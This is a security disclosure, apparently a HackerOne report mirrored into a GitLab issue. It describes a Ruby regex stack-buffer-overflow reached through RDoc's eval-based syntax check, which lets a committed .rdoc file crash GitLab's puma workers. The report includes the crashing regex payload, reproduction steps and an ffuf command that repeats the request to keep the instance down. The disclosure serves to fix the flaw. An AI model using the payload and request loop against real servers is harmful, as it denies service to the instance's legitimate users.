An RDoc file containing a specially crafted regex can crash puma
HackerOne report #1415071 by vakzz
on 2021-12-02, assigned to @dcouture:
Report | Attachments | How To Reproduce
Report
Summary
There is a stack-buffer-overflow in ruby still affecting ruby 2.7.x that can cause a segmentation fault and crash when compiling certain regexes.
Normally there would be no way for a user to specify their own regex to be compiled, but when rendering rdoc files there is a check to see if a block of text is valid ruby:
https://github.com/ruby/rdoc/blob/master/lib/rdoc/markup/to_html.rb#L427
##
# Returns true if text is valid ruby syntax
def parseable? text
verbose, $VERBOSE = $VERBOSE, nil
eval("BEGIN {return true}\n#{text}")
rescue SyntaxError
false
ensure
$VERBOSE = verbose
end
This will never execute any code except for returning true due to how BEGIN
works (I'm pretty sure anyway) but will run it through the ruby parser to generate an ast. Since regexes are compiled during this stage, it's possible to trigger the stack overflow using the following readme.rdoc:
code:
/(())(?<X>)((?(2147483647)))/
I might me possible to exploit the buffer overflow instead of just causing a crash, but if it is possible it would be quite difficult due to not having a leak for aslr and single shot.
Steps to reproduce
- Create a new project
- Create a new file
aaa.rdoc
with the following contents:
code:
/(())(?<X>)((?(2147483647)))/
- Commit and try to view the file
- There will be an error loading the viewer, the request for the rich version will return 502 as puma has crashed
Impact
A malicious rdoc can cause puma to crash when it's rendered. A user could constantly request the url, constantly crashing all of the puma processes and denying access to the gitlab instance. For example running the following ffuf with a rate of just 1 request per second is enough to bring down my vm and prevent any legitimate requests:
ffuf -u 'http://localhost:8888/root/crash/-/blob/main/aaa.rdoc?format=json&viewer=rich&FUZZ' -w /usr/share/dict/words -rate 1 -t 5
Examples
POC repo - https://gitlab.com/vakzz-h1/rdoc-crash/
Crashing example: https://gitlab.com/vakzz-h1/rdoc-crash/-/blob/main/aaa.rdoc?format=json&viewer=rich
What is the current bug behavior?
Ruby crashes when trying to parse a specific regex
What is the expected correct behavior?
Ruby shouldn't crash when parsing regexes, and rdoc probably shouldn't eval code even with the BEGIN
guard
Relevant logs and/or screenshots
Output of checks
This bug happens on GitLab.com
Impact
A malicious rdoc can cause puma to crash when it's rendered. A user could constantly request the url, constantly crashing all of the puma processes and denying access to the gitlab instance. For example running the following ffuf with a rate of just 1 request per second is enough to bring down my vm and prevent any legitimate requests:
ffuf -u 'http://localhost:8888/root/crash/-/blob/main/aaa.rdoc?format=json&viewer=rich&FUZZ' -w /usr/share/dict/words -rate 1 -t 5
Attachments
Warning: Attachments received through HackerOne, please exercise caution!
How To Reproduce
Please add reproducibility information to this section: